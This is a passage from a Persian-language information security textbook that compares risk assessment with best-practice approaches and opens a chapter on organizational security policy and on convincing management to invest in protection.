‫ﺍﻧﺠﺎﻡ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺍﻓﺮﺍﺩ ﺑﻴﺸﻤﺎﺭﻱ ﻓﻜﺮ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﭘﺎﺳـﺦ ﺍﻳـﻦ‬
‫ﺳﺆﺍﻻﺕ ﺭﺍ ﻣﻲﺩﺍﻧﻨﺪ؛ ﺍﻣﺎ ﻣﺤﻘﻘﺎﻥ ﻧﺸﺎﻥ ﺩﺍﺩﻩﺍﻧﺪ ﻛﻪ ﺑﻴﺸﺘﺮ ﺍﻓـﺮﺍﺩ‬
‫ﺑﺮ ﺍﺳﺎﺱ ﺗﺠﺮﺑﺔ ﺷﺨﺼﻲ ﻗﺎﺩﺭ ﺑﻪ ﺗﺨﻤﻴﻦ ﺻﺤﻴﺢ ﻣﺨـﺎﻃﺮﺍﺕ ﻭ‬
‫ﺍﺣﺘﻤﺎﻝ ﻭﻗﻮﻉ ﺁﻧﻬﺎ ﻧﻴﺴﺘﻨﺪ‪.‬‬
‫ﺑﻪ ﻋﻠﺖ ﻣﺸﻜﻼﺕ ﺫﺍﺗﻲ ﺭﻭﺵ ﺍﺭﺯﻳـﺎﺑﻲ ﻣﺨـﺎﻃﺮﻩ‪ ،‬ﺩﺭ ﺳـﺎﻟﻬﺎﻱ‬
‫ﺍﺧﻴﺮ ﺭﻭﻳﻜﺮﺩ ﺩﻳﮕﺮﻱ ﺑﺮﺍﻱ ﺑﺮﻗﺮﺍﺭﻱ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪ ﺑﻮﺟـﻮﺩ ﺁﻣـﺪﻩ‬
‫ﻛﻪ ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ‪ ٧٦‬ﻳـﺎ ﻣﺮﺍﻗﺒـﺖ ﺩﻗﻴـﻖ‪ ٧٧‬ﻧـﺎﻡ ﺩﺍﺭﺩ‪ .‬ﺍﻳـﻦ‬
‫ﺭﻭﻳﻜﺮﺩ ﺷﺎﻣﻞ ﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺯ ﭘﻴﺸﻨﻬﺎﺩﺍﺕ‪ ،‬ﺭﻭﺍﻟﻬﺎ ﻭ ﺳﻴﺎﺳـﺘﻬﺎﻳﻲ‬
‫ﺍﺳﺖ ﻛﻪ ﺑﻄﻮﺭ ﻣﻌﻤﻮﻝ ﺩﺭ ﺟﻮﺍﻣﻊ ﻣﺤﻘﻘﺎﻥ ﺍﻣﻨﻴﺘﻲ ﺗﺎﺋﻴﺪﺷﺪﻩ ﻛـﻪ‬
‫ﺳﺎﺯﻣﺎﻧﻬﺎ ﺭﺍ ﺑﻪ ﺳﻄﺢ ﻗﺎﺑﻞ ﻗﺒﻮﻟﻲ ﺍﺯ ﺍﻣﻨﻴﺖ ﻋﻤﻮﻣﻲ ﻣﻲﺭﺳـﺎﻧﺪ ﻭ‬
‫ﻣﺨﺎﻃﺮﺍﺕ ﺭﺍ ﺑﺎ ﻫﺰﻳﻨﺔ ﻣﻌﻘـﻮﻟﻲ ﻛـﺎﻫﺶ ﻣـﻲﺩﻫـﺪ‪ .‬ﻣـﻲﺗﻮﺍﻧﻴـﺪ‬
‫ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ ﺭﺍ "ﺑـﺪﻳﻬﻴﺎﺕ ﭘﻴـﺎﺩﻩﺳـﺎﺯﻱ ﻣﻨﻄﻘـﻲ ﺗـﺪﺍﺑﻴﺮ‬
‫ﺍﻣﻨﻴﺘﻲ" ﺑﺪﺍﻧﻴﺪ‪.‬‬
‫ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻟﮕﻮﻫــﺎﻱ ﺳــﺮﺁﻣﺪﻱ ﻫـﻢ ﻣــﺸﻜﻼﺕ ﺧــﻮﺩ ﺭﺍ ﺩﺍﺭﺩ‪.‬‬
‫ﺑﺰﺭﮔﺘﺮﻳﻦ ﻣﺸﻜﻞ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻫﻴﭻ ﻣﺠﻤﻮﻋـﻪﺍﻱ ﺍﺯ ﺍﻟﮕﻮﻫـﺎﻱ‬
‫ﺳﺮﺁﻣﺪﻱ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ ﻛﻪ ﺑﺮﺍﻱ ﺗﻤﺎﻡ ﻣﺤﻴﻄﻬﺎ ﻭ ﻛﺎﺭﺑﺮﺍﻥ ﻣﻨﺎﺳﺐ‬
‫ﺑﺎﺷﺪ‪ .‬ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ ﺑﺮﺍﻱ ﻳﻚ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻛـﻪ ﺍﻃﻼﻋـﺎﺕ‬
‫ﻣﺎﻟﻲ ﺭﺍ ﻣﺪﻳﺮﻳﺖ ﻣﻲﻛﻨﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺷﺒﺎﻫﺘﻬﺎﻳﻲ ﺑﻪ ﺍﻟﮕﻮﻫـﺎﻱ‬
‫ﺳﺮﺁﻣﺪﻱ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻳﻚ ﺧﺒﺮﻧﺎﻣﺔ ﺍﺟﺘﻤﺎﻋﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ؛ ﺍﻣﺎ ﺑﻪ‬
‫ﺍﺣﺘﻤﺎﻝ ﺯﻳﺎﺩ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺣﺎﻭﻱ ﺍﻃﻼﻋﺎﺕ ﻣﺎﻟﻲ‪ ،‬ﻧﻴﺎﺯ ﺑﻪ ﺍﻗـﺪﺍﻣﺎﺕ‬
‫ﺍﻣﻨﻴﺘﻲ ﺑﻴﺸﺘﺮﻱ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ‪.‬‬
‫ﺩﻧﺒﺎﻝ ﻛﺮﺩﻥ ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ ﻧﻤﻲﺗﻮﺍﻧـﺪ ﺗـﻀﻤﻴﻦ ﻛﻨـﺪ ﻛـﻪ‬
‫ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﺑﺎ ﻣﺸﻜﻞ ﺍﻣﻨﻴﺘﻲ ﺭﻭﺑـﺮﻭ ﻧﺨﻮﺍﻫـﺪ ﺷـﺪ‪ .‬ﺩﺭ ﻏﺎﻟـﺐ‬
‫ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ‪ ،‬ﺑﺨﺶ ﺍﻣﻨﻴﺖ ﺳﺎﺯﻣﺎﻥ ﺑﺎﻳﺪ ﺍﻳﻨﺘﺮﻧﺖ ﺭﺍ ﺑﺮﺍﻱ‬
‫ﺍﺧﺒــﺎﺭ ﺣﻤــﻼﺕ ﺟﺪﻳــﺪ ﻭ ‪ download‬ﻛــﺮﺩﻥ ﻭﺻــﻠﻪﻫــﺎﻱ‬
‫ﺍﺭﺍﺋﻪﺷﺪﻩ ﺗﻮﺳﻂ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﻣﺤـﺼﻮﻻﺕ ﻧـﺮﻡﺍﻓـﺰﺍﺭﻱ ﺑﺮﺭﺳـﻲ‬
‫ﻧﻤﺎﻳﺪ‪ .‬ﺍﻣﺎ ﺣﺘﻲ ﺍﮔـﺮ ﺷـﻤﺎ ﺍﺯ ﺍﻳـﻦ ﺳـﺎﺧﺘﺎﺭ ﻧﻴـﺰ ﭘﻴـﺮﻭﻱ ﻛﻨﻴـﺪ‪،‬‬
‫ﻣﻬﺎﺟﻤﺎﻥ ﻫﻤﭽﻨﺎﻥ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺮﺍﻱ ﺗﺴﺨﻴﺮ ﺳﻴﺴﺘﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ‬
‫ﺷﻤﺎ ﺍﺯ ﺷﻴﻮﻫﺎﻱ ﻧﺎﺩﺍﻧﺴﺘﺔ ﺗﺎﺯﻩ ﻭ ﻣﻨﺘﺸﺮﻧﺸﺪﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ‪ .‬ﺣﺎﻝ‬
‫‪Best Practices‬‬
‫‪Due Care‬‬
‫‪76‬‬
‫‪77‬‬
‫ﺍﮔﺮ ﺍﻃﻼﻋﺎﺕ ﺷﻤﺎ ﺍﺯ ﺍﺧﺒﺎﺭ ﺟﺪﻳﺪ ﻛﻢ ﺑﺎﺷﺪ ﻭ ﻳـﺎ ﺷﺨـﺼﻲ ﻛـﻪ‬
‫ﻣﺴﺌﻮﻝ ﺑﺮﺭﺳﻲ ﻓﻬﺮﺳﺘﻬﺎﻱ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺍﺳـﺖ ﺩﺭ ﺳـﻔﺮ‬
‫ﺑﺎﺷﺪ‪ ،‬ﻣﻬﺎﺟﻢ ﺍﺯ ﺷﻤﺎ ﭘﻴﺸﻲ ﺧﻮﺍﻫﺪ ﮔﺮﻓﺖ‪.‬‬
‫ﺍﻳﻦ ﺗﻔﻜﺮ ﻛﻪ ﺩﻫﻬﺎ ﻫﺰﺍﺭ ﺳﺎﺯﻣﺎﻥ ﻣﻲﺗﻮﺍﻧﻨـﺪ ﻳـﺎ ﺑﺎﻳـﺪ ﺍﻟﮕﻮﻫـﺎﻱ‬
‫ﺳﺮﺁﻣﺪﻱ ﻣﻮﺟﻮﺩ ﺭﺍ ﺑﺮﺍﻱ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﻫﺎﻳﺸﺎﻥ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻛﻨﻨﺪ‬
‫ﻣﺸﻜﻞ ﺁﻓﺮﻳﻦ ﺍﺳﺖ‪ ،‬ﭼﺮﺍﻛﻪ ﺍﻟﮕﻮﻫﺎﻱ ﺳـﺮﺁﻣﺪﻱ ﻣﻮﺟـﻮﺩ ﺑـﺮﺍﻱ‬
‫ﺗﻤﺎﻣﻲ ﺳﺎﺯﻣﺎﻧﻬﺎ ﻣﻨﺎﺳﺐ ﻭ ﺑﻪﺻﺮﻓﻪ ﻧﻴﺴﺘﻨﺪ‪.‬‬
‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎﻳﻲ ﻛﻪ ﻣﺪﻋﻲ ﻫﺴﺘﻨﺪ ﺍﺯ ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ‬
‫ﭘﻴﺮﻭﻱ ﻣﻲﻛﻨﻨﺪ ﺩﺭ ﺣﻘﻴﻘﺖ ﺍﺯ ﺣﺪﺍﻗﻞ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﺑﺮﺍﻱ ﺍﻣﻨﻴـﺖ‬
‫ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﺧﻮﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻣـﻲﻧﻤﺎﻳﻨـﺪ؛ ﻭ ﺩﺭ ﻋﻤـﻞ‪ ،‬ﺍﻟﮕﻮﻫـﺎﻱ‬
‫ﺳﺮﺁﻣﺪﻱ ﻭ ﻳﺎ ﺑﻌﺒﺎﺭﺗﻲ ﺭﺍﻫﻜﺎﺭﻫﺎﻱ ﺑﻬﻴﻨﻪ ﻫﻢ ﺧﻮﺩ ﻭﺍﻗﻌـﹰﺎ ﺑﻬﻴﻨـﻪ‬
‫ﻧﻴﺴﺘﻨﺪ!‬
‫ﺗﻮﺻﻴﺔ ﻣﺎ ﺗﺮﻛﻴﺒﻲ ﺍﺯ ﺩﻭ ﺭﻭﻳﻜﺮﺩ ﺍﺭﺯﻳـﺎﺑﻲ ﻣﺨـﺎﻃﺮﻩ ﻭ ﺍﻟﮕﻮﻫـﺎﻱ‬
‫ﺳﺮﺁﻣﺪﻱ ﺍﺳﺖ‪ .‬ﺑﺎ ﺷﺮﻭﻉ ﺍﺯ ﺑﺪﻧـﺔ ﻳـﻚ ﻣﺠﻤﻮﻋـﻪ ﺍﺯ ﺍﻟﮕﻮﻫـﺎﻱ‬
‫ﺳﺮﺁﻣﺪﻱ‪ ،‬ﻳﻚ ﻃﺮﺍﺡ ﺁﮔﺎﻩ ﺑﺎﻳـﺪ ﻣﺨـﺎﻃﺮﺍﺕ ﺭﺍ ﺍﺭﺯﻳـﺎﺑﻲ ﻛﻨـﺪ‪ ،‬ﻭ‬
‫ﺑﺮﺍﻱ ﻫﺮ ﺣﺎﻟﺖ ﺧﺎﺹ ﺳﻴﺴﺘﻢ ﻳﻚ ﺭﺍﻩﺣﻞ ﻣﻌﻘﻮﻝ ﺍﺭﺍﺋﻪ ﻧﻤﺎﻳـﺪ‪.‬‬
‫ﺑﺮﺍﻱ ﻣﺜﺎﻝ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎ ﺑﺎﻳﺪ ﺭﻭﻱ ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﻣﺠﺰﺍ ﻗﺮﺍﺭ‬
‫ﺩﺍﺷــﺘﻪ ﺑﺎﺷــﻨﺪ ﻭ ﺍﺯ ﻃﺮﻳــﻖ ﺳﻴــﺴﺘﻢﻋﺎﻣــﻞ ﻭ ﻧــﺮﻡﺍﻓﺰﺍﺭﻫــﺎﻳﻲ‬
‫ﭘﻴﻜﺮﺑﻨﺪﻱ ﺷﻮﻧﺪ ﻛﻪ ﺣﺪﺍﻗﻞ ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺭﻭﻱ ﺁﻧﻬـﺎ ﻓﻌـﺎﻝ‬
‫ﺍﺳﺖ‪ .‬ﻣﺘﺼﺪﻳﺎﻥ ﺑﺎﻳـﺪ ﺩﺭ ﺧـﺼﻮﺹ ﺗﻐﻴﻴـﺮﺍﺕ ﺁﮔـﺎﻩ ﺑﺎﺷـﻨﺪ‪ ،‬ﺑـﺎ‬
‫ﻭﺻﻠﻪﻫﺎ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺭﻭﺯ ﻧﮕﻬﺪﺍﺭﻧﺪ‪ ،‬ﻭ ﻣﻨﺘﻈﺮ ﺣﻮﺍﺩﺙ ﻏﻴﺮﻣﻨﺘﻈـﺮﻩ‬
‫ﺑﺎﺷـﻨﺪ‪ .‬ﺍﻧﺠــﺎﻡ ﺻـﺤﻴﺢ ﺍﻳــﻦ ﻣـﻮﺍﺭﺩ ﻧﻴــﺎﺯ ﺑـﻪ ﺩﺭﻙ ﻋﻤﻴﻘـﻲ ﺍﺯ‬
‫ﭼﮕﻮﻧﮕﻲ ﻋﻤﻠﻜﺮﺩ ﺳﻴﺴﺘﻢ ﻭ ﺩﻻﻳﻞ ﻋﻤﻠﻜﺮﺩ ﻧﺎﺻـﺤﻴﺢ ﺁﻥ ﺩﺍﺭﺩ‪.‬‬
‫ﺍﻳﻦ ﺭﻭﻳﻜﺮﺩﻱ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﺑﺨﺸﻬﺎﻱ ﺑﻌﺪﻱ ﺍﻳﻦ ﻛﺘـﺎﺏ ﺩﻧﺒـﺎﻝ‬
‫ﻣﻲﺷﻮﺩ‪.‬‬
‫‪١٤٩‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬
‫ﻓﺼﻞ ﭘﻨﺠﻢ‬
‫ﭘﻴﺸﮕﻴﺮﻱ ﻭ ﺳﻴﺎﺳﺖ‬
‫ﺍﻣﻨﻴﺖ ﺳﺎﺯﻣﺎﻧﻲ‬
‫ﻛﻠﻴﺎﺕ‬
‫ﺍﻣﻨﻴﺖ ﺩﺭ ﻳﻚ ﺳﺎﺯﻣﺎﻥ ﺩﺭﺣﺎﻝ ﻓﻌﺎﻟﻴﺖ‬
‫ﺍﻣﻨﻴﺖ ﺭﺍﻳﮕﺎﻥ ﻧﻴﺴﺖ‪ .‬ﻫﺮ ﭼﻘـﺪﺭ ﻛـﻪ ﻣﻌﻴﺎﺭﻫـﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺷـﻤﺎ‬
‫ﮔﺴﺘﺮﺩﻩﺗﺮ ﺷﻮﻧﺪ‪ ،‬ﺑﻪ ﻫﻤﺎﻥ ﻣﻴـﺰﺍﻥ ﻫﺰﻳﻨـﺔ ﺁﻧﻬـﺎ ﺑـﺎﻻﺗﺮ ﺧﻮﺍﻫـﺪ‬
‫ﺭﻓﺖ‪ .‬ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺳﻴـﺴﺘﻤﻬﺎﻳﻲ ﻛـﻪ ﺍﺯ ﺍﻣﻨﻴـﺖ ﺑـﺎﻻﺗﺮﻱ ﺑﻬـﺮﻩ‬
‫ﻻ ﺩﺷﻮﺍﺭﺗﺮ ﺍﺳﺖ‪ .‬ﻫﻤﭽﻨﻴﻦ ﺍﻣﻨﻴﺖ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺯ‬
‫ﻣﻲﺑﺮﻧﺪ ﻣﻌﻤﻮ ﹰ‬
‫ﺟﺎﻧﺐ ﻛﺎﺭﺑﺮﺍﻥ ﻗﺪﺭﺗﻤﻨﺪ ‪ -‬ﻛﻪ ﻣﻲﺧﻮﺍﻫﻨﺪ ﻓﻌﺎﻟﻴﺘﻬـﺎﻱ ﺳـﺨﺖ ﻭ‬
‫ﺑﻌﻀﹰﺎ ﺧﻄﺮﻧﺎﻛﻲ ﺍﻧﺠﺎﻡ ﺩﻫﻨﺪ ﺍﻣﺎ ﻏﺎﻟﺒﹰﺎ ﻣﺠﺎﺯ ﺑﻪ ﺍﻧﺠﺎﻡ ﺁﻥ ﻧﻴﺴﺘﻨﺪ‬
‫ﻭ ﺩﺭ ﻗﺒﺎﻝ ﭘﻴﺎﻣﺪﻫﺎﻱ ﺁﻥ ﻧﻴﺰ ﭘﺎﺳﺨﮕﻮ ﻧﻤﻲﺑﺎﺷﻨﺪ ‪ -‬ﻣﻮﺭﺩ ﺗﻬﺪﻳﺪ‬
‫ﻭﺍﻗﻊ ﺷﻮﺩ‪ .‬ﺑﻌﻀﻲ ﺍﺯ ﺍﻳﻦ ﻛﺎﺭﺑﺮﺍﻥ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺩﺭ ﺳـﺎﺯﻣﺎﻥ ﺍﺯ‬
‫ﻗﺪﺭﺕ ﺳﻴﺎﺳـﻲ ﺑﻬـﺮﻩﻣﻨـﺪ ﺑﺎﺷـﻨﺪ‪ .‬ﺍﺯ ﻃـﺮﻑ ﺩﻳﮕـﺮ‪ ،‬ﺑﻌـﻀﻲ ﺍﺯ‬
‫ﺳﺎﺯﻣﺎﻧﻬﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺣﺴﺎﺱ ﻛﻨﻨﺪ ﻛﻪ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﺳـﺎﺯﻣﺎﻥ‬
‫ﺩﺭ ﻳﻚ ﺳﻄﺢ ﻣﻨﺎﺳﺐ ﺑﺴﻴﺎﺭ ﭘﺮﺧﺮﺝ ﻣﻲﺑﺎﺷﺪ ﻭ ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴـﻞ‬
‫ﺑﺪﻭﻥ ﺻﺮﻑ ﻭﻗﺖ ﺑﺮﺍﻱ ﺍﺭﺯﻳﺎﺑﻲ ﻫﺰﻳﻨﻪﻫﺎﻱ ﻭﺍﻗﻌﻲ ﺍﻳﻦ ﺧﻄﺮﺍﺕ‬
‫ﻭ ﺑﺪﻭﻥ ﺗﻮﺟﻪ ﺑﻪ ﻣﻼﺣﻈﺎﺕ ﺍﻣﻨﻴﺘﻲ ﻓﻌﺎﻟﻴﺖ ﺧﻮﺩ ﺭﺍ ﺍﺩﺍﻣﻪ ﺩﻫﻨـﺪ‪.‬‬
‫ﺩﺭ ﺍﻧﺘﻬﺎﻱ ﺑﺨﺶ ﺳﻮﻡ ﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺯ ﻓﻬﺮﺳﺘﻬﺎﻱ ﻛﻨﺘﺮﻝ ﺍﺭﺍﺋـﻪ‬
‫ﺷﺪﻩﺍﻧﺪ ﻛﻪ ﮔﺎﻣﻬـﺎﻱ ﻻﺯﻡ ﺑـﺮﺍﻱ ﺣـﺼﻮﻝ ﺍﻃﻤﻴﻨـﺎﻥ ﺍﺯ ﺗـﺄﻣﻴﻦ‬
‫ﺣﺪﺍﻛﺜﺮ ﺍﻳﻤﻨﻲ ﺩﺭ ﺳﻄﻮﺡ ﻣﺨﺘﻠﻒ ﺭﺍ ﺑﺎ ﺗﻮﺟﻪ ﺑـﻪ ﻣﺤـﺪﻭﺩﻳﺘﻬﺎﻱ‬
‫ﺯﻣﺎﻧﻲ‪ ،‬ﭘﺮﺳﻨﻠﻲ ﻭ ﻣﺎﻟﻲ ﺗﺸﺮﻳﺢ ﻣﻲﻛﻨﻨﺪ‪.‬‬
‫ﭘﺲ ﺍﺯ ﺍﺗﻤﺎﻡ ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨﺎﻃﺮﻩ ﻭ ﺗﺤﻠﻴﻞ ﺳﻮﺩ ﻭ ﺯﻳﺎﻥ‪ ،‬ﺷﻤﺎ ﺑﺎﻳـﺪ‬
‫ﻣﺪﻳﺮﻳﺖ ﺳﺎﺯﻣﺎﻥ ﺭﺍ ﻣﺘﻘﺎﻋﺪ ﻛﻨﻴﺪ ﻛﻪ ﻃﺒﻖ ﺑﺮﻧﺎﻣﻪ ﻋﻤﻞ ﻧﻤﺎﻳﻨـﺪ‪.‬‬
‫ﻏﺎﻟﺐ ﻣﺪﻳﺮﺍﻥ ﺩﺭﺑﺎﺭﺓ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺍﻃﻼﻋﺎﺕ ﻣﺨﺘﺼﺮﻱ ﺩﺍﺭﻧـﺪ‪ ،‬ﻭﻟـﻲ‬
‫ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨﺎﻃﺮﻩ ﻭ ﺗﺤﻠﻴﻞ ﺳﻮﺩ ﻭ ﺯﻳﺎﻥ ﺭﺍ ﺩﺭﻙ ﻣﻲﻛﻨﻨـﺪ‪ .‬ﺍﮔـﺮ‬
‫ﺑﺘﻮﺍﻧﻴﺪ ﻧﺸﺎﻥ ﺩﻫﻴﺪ ﻛﻪ ﺳﺎﺯﻣﺎﻥ ﺩﺭﺣﺎﻝ ﺣﺎﺿـﺮ ﺑـﺎ ﻣﺨـﺎﻃﺮﻩﺍﻱ‬
‫ﻣﻮﺍﺟﻪ ﺍﺳﺖ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎﻋﺚ ﻫﺰﻳﻨﻪﻫﺎﻱ ﺳﺎﻻﻧﺔ ﺯﻳﺎﺩﻱ ﺷـﻮﺩ‬
‫)ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﻨﻈﻮﺭ ﻣﺠﻤﻮﻉ ﺧﺴﺎﺭﺗﻬﺎ ﻭ ﻫﺰﻳﻨﺔ ﺗﻌﻤﻴﺮﺍﺕ ﻫﻤﺔ ﺁﻧﭽﻪ ﻫﻢﺍﻛﻨـﻮﻥ‬
‫ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﺍﺭﺩ ﺭﺍ ﻣﺤﺎﺳﺒﻪ ﻛﻨﻴـﺪ(‪ ،‬ﺁﻧﮕـﺎﻩ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺍﻳـﻦ‬
‫ﺑﺮﺁﻭﺭﺩ ﻣﺪﻳﺮﻳﺖ ﺭﺍ ﻣﺘﻘﺎﻋـﺪ ﻛﻨـﺪ ﻛـﻪ ﺑـﺮﺍﻱ ﺍﺟﺘﻨـﺎﺏ ﺍﺯ ﻭﻗـﻮﻉ‬
‫ﻣﺨﺎﻃﺮﺍﺕ‪ ،‬ﺭﻭﻱ ﻣﻨـﺎﺑﻊ ﻭ ﻛﺎﺭﻛﻨـﺎﻥ ﺳـﺮﻣﺎﻳﻪﮔـﺬﺍﺭﻱ ﺑﻴـﺸﺘﺮﻱ‬
‫ﻧﻤﺎﻳﻨﺪ‪.‬‬
‫ﺍﺯ ﻃﺮﻑ ﺩﻳﮕﺮ ﺍﮔﺮ ﺑﺎ ﺳـﺨﻨﺎﻥ ﻣﺒﻬﻤـﻲ ﻣﺜـﻞ "ﺍﺣﺘﻤـﺎﻝ ﺯﻳـﺎﺩﻱ‬
‫ﻭﺟــﻮﺩ ﺩﺍﺭﺩ ﻛــﻪ ﺑﻌــﺪ ﺍﺯ ﺍﻋﻼﻣﻴــﺔ ﺑﻌــﺪﻱ ‪ CERT/CC‬ﺭﻭﻱ‬
‫ﺍﻳﻨﺘﺮﻧﺖ ﻧﻔﻮﺫﻫﺎﻱ ﻣﺘﻌﺪﺩﻱ ﺭﺥ ﺩﻫﺪ" ﺑﻪ ﻣﺪﻳﺮﻳﺖ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴـﺪ‪،‬‬
‫ﺑﺴﻴﺎﺭ ﺑﻌﻴﺪ ﺍﺳﺖ ﻛﻪ ﻧﺘﻴﺠﻪﺍﻱ ﺟﺰ ﻳـﻚ ﻧﮕﺮﺍﻧـﻲ ﺑـﺴﻴﺎﺭ ﻣﻼﻳـﻢ‬
‫)ﺁﻥ ﻫﻢ ﺗﻨﻬﺎ ﺩﺭ ﺑﻌﻀﻲ ﻣﻮﺍﺭﺩ( ﺑﻪ ﺑﺎﺭ ﺑﻴﺎﻳﺪ!‬
‫ﻧﻘﺶ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ‬
‫ﺳﻴﺎﺳﺖ ﺍﻣﻨﻴﺘﻲ ﺑﻪ ﺗﻌﺮﻳﻒ ﺳﺮﻣﺎﻳﻪﻫﺎﻱ ﺳﺎﺯﻣﺎﻥ ﻛﻤﻚ ﻣﻲﻛﻨـﺪ‬
‫ﻭ ﻧﻴﺰ ﮔﺎﻣﻬﺎﻳﻲ ﻛﻪ ﻻﺯﻡ ﺍﺳﺖ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻳﻦ ﺳـﺮﻣﺎﻳﻪﻫـﺎ‬
‫ﺑﺮﺩﺍﺷﺘﻪ ﺷﻮﺩ ﺭﺍ ﻣﺸﺨﺺ ﻣﻲﻧﻤﺎﻳﺪ‪.‬‬
‫ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺑﻪ ﭼﻨﺪ ﺭﻭﺵ ﻣﺘﻔﺎﻭﺕ ﻣـﻲﺗـﻮﺍﻥ ﺗـﺪﻭﻳﻦ‬
‫ﻛﺮﺩ‪ .‬ﻣﻲ ﺗﻮﺍﻧﻴﺪ ﻳﻚ ﺳﻴﺎﺳﺖ ﻛﻠﻲ ﺑﺴﻴﺎﺭ ﺳﺎﺩﺓ ﭼﻨـﺪ ﺻـﻔﺤﻪﺍﻱ‬
‫ﺑﻨﻮﻳﺴﻴﺪ ﻛﻪ ﺑﻴﺸﺘﺮ ﺍﺣﺘﻤﺎﻻﺕ ﺭﺍ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻪ ﺑﺎﺷـﺪ‪ .‬ﻫﻤﭽﻨـﻴﻦ‬
‫ﻣﻲ ﺗﻮﺍﻧﻴﺪ ﺑﺮﺍﻱ ﻫﺮﻳـﻚ ﺍﺯ ﺩﺍﺭﺍﺋﻴﻬـﺎﻱ ﻣﺨﺘﻠـﻒ ﻳـﻚ ﺳﻴﺎﺳـﺖ‬
‫ﺑﺨﺶ ﺳﻮﻡ‬
‫ﺍﻳﻦ ﻓﺼﻞ ﺑﻄﻮﺭ ﻛﺎﻣﻞ ﺑـﻪ ﺗـﺸﺮﻳﺢ ﺳـﻄﻮﺡ ﻣﺨﺘﻠـﻒ ﺳﻴﺎﺳـﺖ‬
‫ﺍﻣﻨﻴﺘﻲ ﻣﻲﭘﺮﺩﺍﺯﺩ؛ ﻛـﻪ ﺩﺭ ﺁﻥ ﻫـﺮ ﻛﺎﺭﻣﻨـﺪ ﺳـﺎﺯﻣﺎﻥ ﺩﺭ ﺍﻣﻨﻴـﺖ‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎ‪ ،‬ﺷﺒﻜﻪﻫﺎ ﻭ ﺍﻃﻼﻋﺎﺕ ﻧﻘـﺸﻲ ﺑـﺮﺍﻱ ﺍﻳﻔـﺎ ﻛـﺮﺩﻥ ﺩﺍﺭﺩ‪.‬‬
‫ﻓﻬﺮﺳﺘﻬﺎﻱ ﻛﻨﺘﺮﻝ ﻣﺪﻳﺮﻳﺘﻲ ﻛﻪ ﺩﺭ ﺍﻳﻦ ﻗﺴﻤﺖ ﻣﻮﺭﺩ ﺍﺷﺎﺭﻩ ﻗﺮﺍﺭ‬
‫ﮔﺮﻓﺘﻪﺍﻧﺪ ﺭﺍ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺩﺭ ﻓﺼﻮﻝ ﺍﻧﺘﻬﺎﻳﻲ ﻫﻤﻴﻦ ﺑﺨﺶ ﺍﺯ ﻛﺘـﺎﺏ‬
‫ﺑﻴﺎﺑﻴﺪ‪.‬‬
